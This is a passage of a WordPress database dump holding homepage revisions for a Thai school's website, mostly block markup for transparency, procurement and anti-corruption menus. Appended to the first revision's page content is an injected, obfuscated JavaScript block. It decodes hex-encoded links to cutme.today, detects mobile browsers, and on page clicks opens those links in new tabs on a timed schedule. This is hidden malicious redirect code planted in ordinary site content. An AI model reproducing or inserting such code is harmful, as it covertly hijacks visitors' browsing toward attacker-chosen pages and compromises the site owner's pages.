700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:26:04','2024-07-27 04:26:04','',14,'http://pakhaeng.ssk.in.th/?p=98',0,'revision','',0),
(100,1,'2024-07-27 11:40:12','2024-07-27 04:40:12','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\